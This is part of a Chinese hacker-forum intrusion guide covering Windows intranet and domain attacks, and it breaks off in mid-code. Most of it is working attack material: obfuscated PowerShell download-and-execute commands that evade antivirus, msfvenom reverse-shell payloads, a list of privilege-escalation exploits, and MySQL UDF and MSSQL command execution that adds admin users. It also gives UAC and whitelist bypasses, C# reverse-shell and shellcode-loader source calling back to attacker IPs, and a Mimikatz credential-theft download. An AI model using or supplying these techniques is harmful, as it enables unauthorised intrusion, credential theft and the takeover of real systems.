• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

黑客是怎么入侵网站的?全世界首篇最详细渗透测试中文文章(第3部分)


This Wind

Recommended Posts

内网&域

Powershell

查看版本$PSVersionTable

远程执行

>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('');Invoke-xxx"

image

加载exe

msfvenom生成exe木马
#msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f exe > /var/www/html/1.exe  
使用powersploit的Invoke-ReflectivePEInjection.ps1脚本
#powershell.exe -w hidden -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/clymberps/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.107/1.exe -ForceASLR" 

EXE2PS1

http://192.168.0.107/ps/powersploit/CodeExecution/Convert-BinaryToString.ps1
将exe转换为base64
>Import-Module .\Convert-BinaryToString.ps1
>Convert-BinaryToString -FilePath .\ms15051.exe

image

http://192.168.0.107/ps/powersploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection.ps1文件头部添加
Function MS15051{
<#
.SYNOPSIS    
.EXAMPLE
C:\PS> MS15051 -Command "whoami"
#>
 [CmdletBinding()]
    param(
        [Parameter(Mandatory = $False)]
        [string]
        $Command
  )
$InputString = "文件的base64编码"
$PEBytes = [System.Convert]::FromBase64String($InputString)
文件尾部添加
write-host ("[+] Executing Command: "+$Command)  -foregroundcolor "Green"
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs $Command 
write-host ("[+] Done !")  -foregroundcolor "Green"
}

image

远程下载执行
>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powersploit/CodeExecution/ms15051.ps1'); MS15051 –Command \"whoami\""

image

绕过策略

>powershell Set-ExecutionPolicy Unrestricted需管理员权限,不受限执行
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-xxx.ps1');invoke-xxx"
>powershell -exec bypass -File ./a.ps1&>Import-Module xxx

Base64

>use exploit/multi/script/web_delivery|target=2(PSH)
&
>cat payload.txt | iconv --to-code UTF-16LE |base64
>powershell -ep bypass -enc base64code

写入bat绕过

powershell -exec bypass -File ./a.ps1 
将该命令保存为c.bat

拼接拆分字符串

powershell.exe  
"
$c1='powershell -c IEX'; 
$c2='(New-Object Net.WebClient).Downlo'; 
$c3='adString("http://192.168.197.192/a.ps1")'; 
echo ($c1,$c2,$c3) 
" 
先将命令拆分为字符串,然后进行拼接。echo修改为IEX执行。
powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)

Replace替换函数

powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)" 

HTTP字符拼接绕过

也可以对http字符进行绕过,同样可以bypass
powershell "$a='IEX((new-object net.webclient).downloadstring("ht';$b='tp://192.168.197.192/a.ps1"))';IEX ($a+$b)"  

图片免杀

通过图片免杀执行powershell的脚本Invoke-PSImage.ps1,主要把payload分散存到图片的像素中,最后到远端执行时,再重新遍历重组像素中的payload执行。
https://github.com/peewpw/Invoke-PSImage
1900*1200的图片x.jpg。
C:\>powershell 
PS C:\> Import-Module .\Invoke-PSImage.ps1 
PS C:\> Invoke-PSImage -Script .\a.ps1 -Image .\x.jpg -Out .\reverse_shell.png -Web 
a.ps1是msf木马,-Out 生成reverse_shell.png图片,-Web 输出从web读取的命令。
将reverse_shell.png移动至web目录,替换url地址。在powershell下执行即可。

加载shellcode

msfvenom生成脚本木马
#msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.72.164 LPORT=4444 -f powershell -o /var/www/html/test  
在windows靶机上运行一下命令
PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") 
PS >IEX(New-Object Net.WebClient).DownloadString("http://192.168.72.164/test") 
Invoke-Shellcode -Shellcode $buf -Force  运行木马 
使用Invoke-Shellcode.ps1脚本执行shellcode
即可反弹meterpreter shell

加载dll

使用msfvenom 生成dll木马脚本
>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.164 lport=4444 -f dll -o /var/www/html/test.dll 
将生成的dll上传到目标的C盘。在靶机上执行以下命令
PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-DllInjection.ps1") 
Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden  
创建新的进程启动记事本,并设置为隐藏
Invoke-DllInjection -ProcessID xxx -Dll c:\test.dll 使用notepad的PID  
Msf
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_tcp
#run

Windows安全标识符(SID)

相对标识符 说明
500 管理员
501 来宾
502 密钥分发中心服务的服务账户
512 域管理员
513 域用户
514 域来宾
515 域计算机
516 域控制器
544 内置管理员
519 企业管理员

提权

Impacket工具包

https://github.com/maaaaz/impacket-examples-windows
https://github.com/SecureAuthCorp/impacket
#git clone https://github.com/CoreSecurity/impacket.git 
#cd impacket/ 
#python setup.py install

Windows-exploit-suggester

#pip install xlrd --upgrade
#./windows-exploit-suggester.py --update
#./windows-exploit-suggester.py --database 20xx-xx-xx-mssb.xlsx --systeminfo systeminfo.txt

Wesng

https://github.com/bitsadmin/wesng
>systeminfo >1.txt
>python wes.py 1.txt

image

Searchsploit

使用方法
>searchsploit 软件 版本
查找常见补丁
https://bugs.hacking8.com/tiquan/
http://get-av.se7ensec.cn/index.php
https://patchchecker.com/checkprivs/
wmic查询补丁
wmic qfe list full|findstr /i hotfix
systeminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440  KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i  "%i"|| @echo %i Not Installed!)&del /f /q /a temp.txt
MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8) 
CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008) 
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008) 
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP) 
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016) 
MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1) 
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1) 
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012) 
MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012) 
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012) 
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7) 
MS15-097 [KB3089656] [remote code execution] (win8.1/2012) 
MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012) 
MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012) 
MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012) 
MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012) 
MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8) 
MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2) 
MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8) 
MS14-070 [KB2989935] [Kernel Driver] (2003) 
MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8) 
MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8) 
MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8) 
MS14-002 [KB2914368] [NDProxy] (2003/XP) 
MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7) 
MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7) 
MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8) 
MS12-042 [KB2972621] [Service Bus] (2008/2012/win7) 
MS12-020 [KB2671387] [RDP] (2003/2008/7/XP) 
MS11-080 [KB2592799] [AFD.sys] (2003/XP) 
MS11-062 [KB2566454] [NDISTAPI] (2003/XP) 
MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP) 
MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista) 
MS10-092 [KB2305420] [Task Scheduler] (2008/7) 
MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5) 
MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista) 
MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7) 
MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP) 
MS10-012 [KB971468] [SMB Client Trans2 stack overflow] (Windows 7/2008R2) 
MS09-050 [KB975517] [Remote Code Execution] (2008/Vista) 
MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0) 
MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista) 
MS08-068 [KB957097] [Remote Code Execution] (2000/XP) 
MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008) 
MS08-066 [] [] (Windows 2000/XP/Server 2003) 
MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista) 
MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000) 
MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)

激活guest

>net user guest /active:yes

MYSQL udf

Udf: sqlmap-master\udf\mysql\windows\
>python sqlmap/extra/cloak/cloak.py lib_mysqludf_sys.dll _ 
Mysql>5.1 udf.dll放置在lib\plugin 
Mysql<5.1 udf.dll放置在c:\windows\system32
#show variables like '%compile%'; 查看系统版本
#select @@plugin_dir 查看插件目录
放入udf
#select load_file('\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll"; 
或将udf十六进制编码后写入
#select hex(load_file('udf_sys_64.dll')) into dumpfile '/tmp/udf.hex'; 
#select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000… into dump file "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
或将udf base64编码后写入(MySQL 5.6.1和MariaDB 10.0.5)
#select to_base64(load_file('/usr/udf.dll')) into dumpfile '/tmp/udf.b64';
#select from_base64(“xxxxx”) into dumpfile "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
或创建表拼接十六进制编码
#create table temp(data longblob); 
#insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d); 
#update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b3); 
#select data from temp into dump file "D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll";
或#insert into temp(data) values(hex(load_file('D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll')));
#SELECT unhex(cmd) FROM mysql.temp INTO DUMPFILE 'D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll ';
或使用快速导入数据
#load data infile '\\\\192.168.0.19\\network\\udf.hex'
#into table temp fields terminated by '@OsandaMalith' lines terminated by '@OsandaMalith' (data); 
#select unhex(data) from temp into dumpfile 'D:\\MySQL\\mysql-5.7.2\\lib\\plugin\\udf.dll';
创建函数
#create function cmdshell returns string soname 'udf.dll';
#create function sys_exec returns int soname 'udf.dll';
执行命令
#select cmdshell('whoami'); 
#select sys_exec(''whoami''); 
删除函数
#drop function cmdshell;
#drop function sys_exec;

MYSQL Linux Root

https://0xdeadbeef.info/exploits/raptor_udf2.c
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
$ mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
name ret dl type
do_system 2 raptor_udf2.so function
mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

MSSQL

开启xp_cmdshell

xp_cmdshell

#exec sp_configure 'show advanced options', 1;reconfigure; 
#exec sp_configure 'xp_cmdshell',1;reconfigure;
#exec master.dbo.xp_cmdshell 'ipconfig'

xp_regwrite

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'

xp_dirtree

execute master..xp_dirtree 'c:' //列出所有c:\文件和目录,子目录 
execute master..xp_dirtree 'c:',1 //只列c:\文件夹 
execute master..xp_dirtree 'c:',1,1 //列c:\文件夹加文件 

sp_oacreate

exec sp_configure 'show advanced options', 1;RECONFIGURE;
exec sp_configure 'Ola Automation Procedures' , 1;RECONFIGURE;
执行命令
declare @shell int 
exec sp_oacreate 'wscript.shell',@shell output 
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123 123 /add'
declare @shell int 
exec sp_oacreate 'wscript.shell',@shell output 
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123/add'
删除文件
declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token
复制文件
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'
移动文件
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\2.txt'

沙盒执行

开启沙盒:
>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
执行:
>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')

WarSQLKit(后门)

http://eyupcelik.com.tr/guvenlik/493-mssql-fileless-rootkit-warsqlkit

MSF

发现补丁
#use post/windows/gather/enum_patches
列举可用EXP
#use post/multi/recon/local_exploit_suggester

Bypass UAC

MSF

>use exploit/windows/local/bypassuac 
>use exploit/windows/local/bypassuac_injection
>use exploit/windows/local/bypassuac_vbs
>use exploit/windows/local/bypassuac_fodhelper
>use exploit/windows/local/bypassuac_eventvwr
>use exploit/windows/local/bypassuac_comhijack

DccwBypassUAC

Use on win10&win8

image

K8uac

>k8uac.exe xx.exe
>k8uac.exe "command"

CMSTP

设置UAC和Applocker规则

image image image image

MSF生成恶意DLL传入靶机
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/cm.dll

image

DLL同目录下建立run.inf,RegisterOCXSection指定dll位置,也可以指定远程webdav
如:\\192.168.0.107\webdav\cm.dll
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\y.SUB2K8\Desktop\cm.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="cmstp"
ShortSvcName="cmstp"
执行命令可绕过UAC和Applocker上线
>cmstp /s run.inf

image

Uacme

包括DLL劫持,COM劫持等50多种bypass方法
https://github.com/hfiref0x/UACME

image

使用visual studio编译
Visual Studio 2013v120;
Visual Studio 2015v140;
Visual Studio 2017v141;
Visual Studio 2019v142。
目前共59种bypassuac方式
执行方法是
>akagi.exe 1
>akagi.exe 1 c:\windows\system32\cmd.exe
>akagi.exe 1 "net user 1 1 /add"
注意:
方式5,9会对目标安全性产生影响,谨慎使用,5需重启
方式6从win8开始在x64上不可用
方式11,54只支持x32 
方式13,19,30,50只支持x64
方式14需要进程注入,x64要使用x64的工具

Bypass-UAC

https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC
>Bypass-UAC -Method UacMethodSysprep

image

Method:
UacMethodSysprep
ucmDismMethod
UacMethodMMC2
UacMethodTcmsetup
UacMethodNetOle32

DLL hijack

程序运行,调用DLL的流程
1.程序所在目录
2.系统目录即 SYSTEM32 目录
3.16位系统目录即 SYSTEM 目录
4.Windows目录
5.加载 DLL 时所在的当前目录
6.PATH环境变量中列出的目录
使用
https://docs.microsoft.com/zh-cn/sysinternals/downloads/sigcheck
检查一个程序的是否以高权限执行
>sigcheck.exe -m c:\1.exe
查看autoElevate是否为true

image

使用process monitor查看对应程序执行时调用的DLL情况,查找DLL不在
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs列表中,并且所在文件夹当前用户可读写,接下来生成恶意dll备份原DLL替换,再运行此程序即可劫持成功。

SilentCleanup

>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
>schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Sdclt

win10
1
>reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f 获得管理员权限
>sdclt 弹出cmd
>reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f 清除痕迹
2
https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1
>Invoke-SDCLTBypass -Command "c:\windows\system32\cmd.exe /c C:\Windows\regedit.exe"
>sdclt.exe /KickOffElev

Makecab&Wusa

复制文件出错时

image

>makecab PsExec64.exe C:\Users\y.ZONE\Desktop\ps.cab
>wusa C:\Users\y.ZONE\Desktop\ps.cab /extract:C:\Windows\system32\

image

CLR BypassUAC

Tested on win10 x64
生成dll传入受控机temp目录,以下保存为1.bat执行。
REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\Temp\test.dll" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
REG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER_PATH" /t REG_SZ /d "C:\Temp\test.dll" /f
受控机执行gpedit.msc或eventvwr等高权限.net程序时可劫持成功。

image

执行后

image image image

eventvwr劫持注册表

打开ProcessMonitor,启动eventvwr,ctrl+T打开进程树,选择进程转到事件

image

右键选择包括eventvwr.exe

image

只选择显示注册表活动

image

添加一条过滤器,显示not found文件

image

找到相应的注册表位置

image image

值修改为

image

MSF监听,再次打开eventvwr

image

Web Delivery

>use exploit/multi/script/web_delivery
>set target 3
>set payload windows/x64/meterpreter/reverse_tcp
>exploit
>use auxiliary/server/regsvr32_command_delivery_server
>set cmd ipconfig
>use exploit/windows/misc/regsvr32_applocker_bypass_server

Invoke-PsUACme

method="sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc"
>Invoke-PsUACme -method oobe -Payload "c:\user\a\desktop\x.exe"
需指定绝对路径
>Invoke-PsUACme -method oobe -Payload "powershell -w hidden -e xxxxxx"
>Invoke-PsUACme -Payload "powershell -noexit IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
MSFVENOM生成psh-reflection格式脚本
>Invoke-PsUACme –Payload "powershell c:\1.ps1"

Whitelist(白名单)

GreatSCT

>git clone https://github.com/GreatSCT/GreatSCT.git
>cd GreatSCT/setup&./setup.sh
>use Bypass
>list
>use regasm/meterpreter/rev_tcp.py
>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

JSRat

>JSRat.py -i 192.168.1.107 -p 4444

Odbcconf.exe

>odbcconf.exe /a {regsvr C:\shell.dll} 可以是任意后缀

Msiexec.exe

>msiexec /y c:\user\admin\desktop\1.dll
>msiexec /q /i http://192.168.0.107/dll.dll

InstallUtil.exe

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:y.exe  /unsafe C:\Users\y\Desktop\1.cs
using System;
using System.Net;
using System.Linq;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;
using System.Configuration.Install;
using System.Windows.Forms;
public class GQLBigHgUniLuVx {
	public static void Main()
	{
		while(true)
		{{ MessageBox.Show("doge"); Console.ReadLine();}}
	}
}
[System.ComponentModel.RunInstaller(true)]
public class esxWUYUTWShqW : System.Configuration.Install.Installer
{
	public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu)
	{
		jkmhGrfzsKQeCG.LCIUtRN();
	}
}
public class jkmhGrfzsKQeCG
{ [DllImport("kernel")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF,UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI);
[DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp,IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);
static byte[] ErlgHH(string ZwznjBJY,int KsMEeo) {
IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
catch { return null;}
byte[] UmquAHRnhhpuE = new byte[4];
XXxIoIXNCle.Receive(UmquAHRnhhpuE,4,0);
int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE,0);
byte[] qaYyFq = new byte[kFVRSNnpj +5];
int SRCDELibA =0;
while(SRCDELibA < kFVRSNnpj)
{ SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA +5,(kFVRSNnpj - SRCDELibA)<4096 ? (kFVRSNnpj - SRCDELibA) : 4096,0);}
byte[] TvvzOgPLqwcFFv =BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
Array.Copy(TvvzOgPLqwcFFv,0, qaYyFq,1,4); qaYyFq[0]=0xBF;
return qaYyFq;}
static void cmMtjerv(byte[] HEHUjJhkrNS) {
if(HEHUjJhkrNS !=null) {
UInt32 WcpKfU = VirtualAlloc(0,(UInt32)HEHUjJhkrNS.Length,0x1000,0x40);
Marshal.Copy(HEHUjJhkrNS,0,(IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
UInt32 wdjYKFDCCf =0;
IntPtr XVYcQxpp = IntPtr.Zero;
UhxtIFnlOQatrk = CreateThread(0,0, WcpKfU, XVYcQxpp,0, ref wdjYKFDCCf);
WaitForSingleObject(UhxtIFnlOQatrk,0xFFFFFFFF); }}
public static void LCIUtRN() {
byte[] IBtCWU =null; IBtCWU = ErlgHH("192.168.0.107",12138);
cmMtjerv(IBtCWU);
} }
生成exe后执行
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\y.exe
MSF监听12138端口

Compiler.exe

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 1.xml 1.tcp

image

1.xml
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>1.tcp</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<d2p1:checkTypes>false</d2p1:checkTypes>
<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
<d2p1:compilerOptions i:nil="true" />
<d2p1:generateCCU>false</d2p1:generateCCU>
<d2p1:languageToUse>CSharp</d2p1:languageToUse>
<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
<d2p1:mtInfo i:nil="true"/>
<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
</parameters>
</CompilerInput>
1.tcp
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities; 
public class Program : SequentialWorkflowActivity
{
static StreamWriter streamWriter; 
public Program()
{
using(TcpClient client = new TcpClient("192.168.0.107", 12138))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream); 
StringBuilder strInput = new StringBuilder(); 
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine(); 
while(true)
{
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
} 
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder(); 
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
} 
}
>msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f csharp
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 1.xml 1.cs

image

using System.Workflow.Activities;
using System.Net; 
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;
class yrDaTlg : SequentialWorkflowActivity {
[DllImport("kernel32")] private static extern IntPtr VirtualAlloc(UInt32 rCfMkmxRSAakg,UInt32 qjRsrljIMB, UInt32 peXiTuE, UInt32 AkpADfOOAVBZ);
